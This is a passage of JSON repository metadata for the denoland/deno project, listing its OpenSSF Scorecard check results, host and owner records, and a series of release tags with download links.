","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/re